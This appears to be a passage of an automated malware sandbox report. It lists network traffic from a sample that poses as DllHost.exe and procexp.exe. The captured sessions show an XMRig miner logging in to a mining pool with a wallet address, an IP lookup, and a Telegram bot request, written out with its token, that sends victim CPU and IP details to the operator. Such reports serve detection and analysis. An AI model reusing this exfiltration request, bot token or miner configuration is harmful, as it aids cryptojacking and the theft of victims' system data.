                                                                                                                                                            Jul 7, 2022 09:51:12.274305105 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.274341106 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.274354935 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.274383068 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.274394989 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.274403095 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.274429083 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.274432898 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.274455070 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.274462938 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.274480104 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.274490118 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.274502993 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.274508953 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.274516106 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.274557114 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.274597883 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.274607897 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.274631977 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.274673939 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.274682999 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.274699926 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.274708986 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.274722099 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.274729013 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.274755001 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.274765968 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.274800062 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.274805069 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.274816990 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.274838924 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.274840117 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.274878025 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.274885893 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.274900913 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.274909973 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.274923086 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.274936914 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.274943113 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.274980068 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.275000095 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275012970 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.275019884 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275047064 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.275065899 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.275074005 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275105000 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275144100 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.275152922 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275178909 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275180101 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.275201082 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.275204897 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275217056 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275243044 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.275279045 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.275293112 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275316000 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275358915 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.275367022 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275381088 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275391102 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.275403976 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275407076 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.275415897 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275444984 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.275482893 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.275500059 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275521994 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275563002 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.275571108 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275587082 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.275602102 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275614023 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.275619984 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275649071 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275662899 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.275707006 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.275715113 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275780916 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.275794029 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275818110 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275870085 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.275878906 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275916100 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.275935888 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275940895 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.275949001 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275983095 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.275996923 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.276035070 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.276042938 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.276052952 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.276087999 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.276110888 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.276138067 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.276191950 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.276200056 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.276226044 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.276247978 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.276278973 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.276284933 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.276289940 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.276310921 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.276315928 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.276330948 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.276371002 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:12.276376963 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.276413918 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.290779114 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.291825056 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.346532106 CEST49754443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:12.346581936 CEST44349754162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:17.970226049 CEST4976080192.168.2.4131.153.56.98
                                                                                                                                                            Jul 7, 2022 09:51:18.139388084 CEST8049760131.153.56.98192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:18.140594006 CEST4976080192.168.2.4131.153.56.98
                                                                                                                                                            Jul 7, 2022 09:51:18.141462088 CEST4976080192.168.2.4131.153.56.98
                                                                                                                                                            Jul 7, 2022 09:51:18.308620930 CEST8049760131.153.56.98192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:18.315850019 CEST8049760131.153.56.98192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:18.412405014 CEST4976080192.168.2.4131.153.56.98
                                                                                                                                                            Jul 7, 2022 09:51:34.284090042 CEST49763443192.168.2.43.220.57.224
                                                                                                                                                            Jul 7, 2022 09:51:34.284147024 CEST443497633.220.57.224192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:34.284260988 CEST49763443192.168.2.43.220.57.224
                                                                                                                                                            Jul 7, 2022 09:51:34.392981052 CEST49763443192.168.2.43.220.57.224
                                                                                                                                                            Jul 7, 2022 09:51:34.393018007 CEST443497633.220.57.224192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:34.681314945 CEST443497633.220.57.224192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:34.681468010 CEST49763443192.168.2.43.220.57.224
                                                                                                                                                            Jul 7, 2022 09:51:34.700330973 CEST49763443192.168.2.43.220.57.224
                                                                                                                                                            Jul 7, 2022 09:51:34.700361967 CEST443497633.220.57.224192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:34.700756073 CEST443497633.220.57.224192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:34.700855970 CEST49763443192.168.2.43.220.57.224
                                                                                                                                                            Jul 7, 2022 09:51:34.714266062 CEST49763443192.168.2.43.220.57.224
                                                                                                                                                            Jul 7, 2022 09:51:34.756535053 CEST443497633.220.57.224192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:34.996046066 CEST443497633.220.57.224192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:34.996117115 CEST443497633.220.57.224192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:34.996234894 CEST49763443192.168.2.43.220.57.224
                                                                                                                                                            Jul 7, 2022 09:51:34.998286963 CEST49763443192.168.2.43.220.57.224
                                                                                                                                                            Jul 7, 2022 09:51:34.998322964 CEST443497633.220.57.224192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:35.404898882 CEST49765443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:51:35.404934883 CEST44349765149.154.167.220192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:35.405265093 CEST49765443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:51:35.405631065 CEST49765443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:51:35.405642986 CEST44349765149.154.167.220192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:35.466909885 CEST44349765149.154.167.220192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:35.467166901 CEST49765443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:51:35.479922056 CEST49765443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:51:35.479940891 CEST44349765149.154.167.220192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:35.480402946 CEST44349765149.154.167.220192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:35.480505943 CEST49765443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:51:35.481214046 CEST49765443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:51:35.528500080 CEST44349765149.154.167.220192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:35.605072975 CEST44349765149.154.167.220192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:35.605175018 CEST44349765149.154.167.220192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:35.605191946 CEST49765443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:51:35.605431080 CEST49765443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:51:35.610754013 CEST49765443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:51:35.610776901 CEST44349765149.154.167.220192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:35.610784054 CEST49765443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:51:35.610862017 CEST49765443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:52:01.084676027 CEST8049760131.153.56.98192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:52:01.139650106 CEST4976080192.168.2.4131.153.56.98
                                                                                                                                                            Jul 7, 2022 09:52:40.504337072 CEST8049760131.153.56.98192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:52:40.622601032 CEST4976080192.168.2.4131.153.56.98
                                                                                                                                                            Jul 7, 2022 09:52:42.590212107 CEST4976080192.168.2.4131.153.56.98

                                                                                                                                                            UDP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Jul 7, 2022 09:51:07.656203032 CEST6445453192.168.2.48.8.8.8
                                                                                                                                                            Jul 7, 2022 09:51:07.677176952 CEST53644548.8.8.8192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:08.895900011 CEST6050653192.168.2.48.8.8.8
                                                                                                                                                            Jul 7, 2022 09:51:08.915281057 CEST53605068.8.8.8192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.253988981 CEST6427753192.168.2.48.8.8.8
                                                                                                                                                            Jul 7, 2022 09:51:09.275779963 CEST53642778.8.8.8192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:17.942915916 CEST5607653192.168.2.48.8.8.8
                                                                                                                                                            Jul 7, 2022 09:51:17.964555025 CEST53560768.8.8.8192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:34.171300888 CEST6075853192.168.2.48.8.8.8
                                                                                                                                                            Jul 7, 2022 09:51:34.190413952 CEST53607588.8.8.8192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:35.356350899 CEST6064753192.168.2.48.8.8.8
                                                                                                                                                            Jul 7, 2022 09:51:35.377556086 CEST53606478.8.8.8192.168.2.4

                                                                                                                                                            DNS Queries

                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                            Jul 7, 2022 09:51:07.656203032 CEST192.168.2.48.8.8.80x17a4Standard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                                                                                                                                            Jul 7, 2022 09:51:08.895900011 CEST192.168.2.48.8.8.80x87f4Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                                                            Jul 7, 2022 09:51:09.253988981 CEST192.168.2.48.8.8.80xc378Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                            Jul 7, 2022 09:51:17.942915916 CEST192.168.2.48.8.8.80x379eStandard query (0)pool.hashvault.proA (IP address)IN (0x0001)
                                                                                                                                                            Jul 7, 2022 09:51:34.171300888 CEST192.168.2.48.8.8.80xb133Standard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                                                                                                                                            Jul 7, 2022 09:51:35.356350899 CEST192.168.2.48.8.8.80x70b6Standard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                                                                                                                            DNS Answers

                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                            Jul 7, 2022 09:51:07.677176952 CEST8.8.8.8192.168.2.40x17a4No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                            Jul 7, 2022 09:51:07.677176952 CEST8.8.8.8192.168.2.40x17a4No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)
                                                                                                                                                            Jul 7, 2022 09:51:07.677176952 CEST8.8.8.8192.168.2.40x17a4No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)
                                                                                                                                                            Jul 7, 2022 09:51:07.677176952 CEST8.8.8.8192.168.2.40x17a4No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)
                                                                                                                                                            Jul 7, 2022 09:51:07.677176952 CEST8.8.8.8192.168.2.40x17a4No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)
                                                                                                                                                            Jul 7, 2022 09:51:08.915281057 CEST8.8.8.8192.168.2.40x87f4No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                                                            Jul 7, 2022 09:51:09.275779963 CEST8.8.8.8192.168.2.40xc378No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                            Jul 7, 2022 09:51:09.275779963 CEST8.8.8.8192.168.2.40xc378No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                            Jul 7, 2022 09:51:09.275779963 CEST8.8.8.8192.168.2.40xc378No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                            Jul 7, 2022 09:51:09.275779963 CEST8.8.8.8192.168.2.40xc378No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                            Jul 7, 2022 09:51:09.275779963 CEST8.8.8.8192.168.2.40xc378No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                            Jul 7, 2022 09:51:17.964555025 CEST8.8.8.8192.168.2.40x379eNo error (0)pool.hashvault.pro131.153.142.106A (IP address)IN (0x0001)
                                                                                                                                                            Jul 7, 2022 09:51:17.964555025 CEST8.8.8.8192.168.2.40x379eNo error (0)pool.hashvault.pro131.153.56.98A (IP address)IN (0x0001)
                                                                                                                                                            Jul 7, 2022 09:51:34.190413952 CEST8.8.8.8192.168.2.40xb133No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                            Jul 7, 2022 09:51:34.190413952 CEST8.8.8.8192.168.2.40xb133No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)
                                                                                                                                                            Jul 7, 2022 09:51:34.190413952 CEST8.8.8.8192.168.2.40xb133No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)
                                                                                                                                                            Jul 7, 2022 09:51:34.190413952 CEST8.8.8.8192.168.2.40xb133No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)
                                                                                                                                                            Jul 7, 2022 09:51:34.190413952 CEST8.8.8.8192.168.2.40xb133No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)
                                                                                                                                                            Jul 7, 2022 09:51:35.377556086 CEST8.8.8.8192.168.2.40x70b6No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                            • api.ipify.org
                                                                                                                                                            • api.telegram.org
                                                                                                                                                            • cdn.discordapp.com

                                                                                                                                                            HTTP Packets

                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            0192.168.2.44973352.20.78.240443C:\Users\user\Desktop\DllHost.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            1192.168.2.449739149.154.167.220443C:\Users\user\Desktop\DllHost.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            2192.168.2.449746162.159.134.233443C:\Users\user\Desktop\DllHost.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            3192.168.2.449754162.159.134.233443C:\Users\user\Desktop\DllHost.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            4192.168.2.4497633.220.57.224443C:\ProgramData\MicrosoftNetwork\System.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            5192.168.2.449765149.154.167.220443C:\Users\user\Desktop\DllHost.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            6192.168.2.449760131.153.56.9880C:\ProgramData\Systemd\procexp.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Jul 7, 2022 09:51:18.141462088 CEST5539OUTData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 32 6b 46 54 62 50 6b 72 70 45 59 38 4b 52 53 64 52 6a 7a 4c 70
                                                                                                                                                            Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"42kFTbPkrpEY8KRSdRjzLpawdNvmR1BTKPRfaaGoq9TcDNhnKapy9G99eH9AsJon766YDYnKEobxycNSDuHbPG3JHV5zKut","pass":"x","agent":"XMRig/6.17.0 (Windows NT 10.0; Win64; x64) libuv/1.43.0 gcc/11.2.0
                                                                                                                                                            Jul 7, 2022 09:51:18.315850019 CEST5540INData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 32 36 37 65 35 37 66 30 2d 66 30 31 32 2d 34 39 33 30 2d 38 31 61 32 2d 64 64 65 62 38
                                                                                                                                                            Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"267e57f0-f012-4930-81a2-ddeb80f8a7d5","job":{"blob":"0e0eefa09a9606f7456152e0b8f85895af2f7607ccbc84e6b236febf0dec2ef5845c70be340cc600000000a86fee8d6e58d4af7c367329b2defafb0a338f039d16a6768b2
                                                                                                                                                            Jul 7, 2022 09:52:01.084676027 CEST5883INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 30 65 30 65 65 66 61 30 39 61 39 36 30 36 66 37 34 35 36 31 35 32 65 30 62 38 66 38 35 38 39 35
                                                                                                                                                            Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"0e0eefa09a9606f7456152e0b8f85895af2f7607ccbc84e6b236febf0dec2ef5845c70be340cc600000000181b7f88a651b232104eb98b3e7c41abc8edc460aae0c6d656f4522e93e499920d","job_id":"a442d1d3-bffc-4c73-befd-a6e23
                                                                                                                                                            Jul 7, 2022 09:52:40.504337072 CEST5986INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 30 65 30 65 63 38 61 31 39 61 39 36 30 36 61 66 62 30 64 66 30 36 38 63 36 31 61 65 33 64 65 66
                                                                                                                                                            Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"0e0ec8a19a9606afb0df068c61ae3def21e11d969be43a2954a6a475b0e2646b9126a247a84cf300000000cee45a75f360020119156cdefbeaa8f74177a62575d69dfc7a627e5516a6dc9411","job_id":"255aa5de-8c7a-4d85-adc0-fef17


                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            0192.168.2.44973352.20.78.240443C:\Users\user\Desktop\DllHost.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-07-07 07:51:08 UTC0OUTGET / HTTP/1.1
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36
                                                                                                                                                            Host: api.ipify.org
                                                                                                                                                            2022-07-07 07:51:08 UTC0INHTTP/1.1 200 OK
                                                                                                                                                            Server: Cowboy
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                            Vary: Origin
                                                                                                                                                            Date: Thu, 07 Jul 2022 07:51:08 GMT
                                                                                                                                                            Content-Length: 14
                                                                                                                                                            Via: 1.1 vegur
                                                                                                                                                            2022-07-07 07:51:08 UTC0INData Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 39 32
                                                                                                                                                            Data Ascii: 102.129.143.92


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            1192.168.2.449739149.154.167.220443C:\Users\user\Desktop\DllHost.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-07-07 07:51:09 UTC0OUTGET /bot5468819057:AAHRJabfvGnrMiNkuZj9RaE8-OjfRBxOw-4/sendMessage?chat_id=1327052997&text=New%20User:%20618321%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0AIP:%20102.129.143.92 HTTP/1.1
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36
                                                                                                                                                            Host: api.telegram.org
                                                                                                                                                            2022-07-07 07:51:09 UTC0INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                            Date: Thu, 07 Jul 2022 07:51:09 GMT
                                                                                                                                                            Content-Type: application/json
                                                                                                                                                            Content-Length: 392
                                                                                                                                                            Connection: close
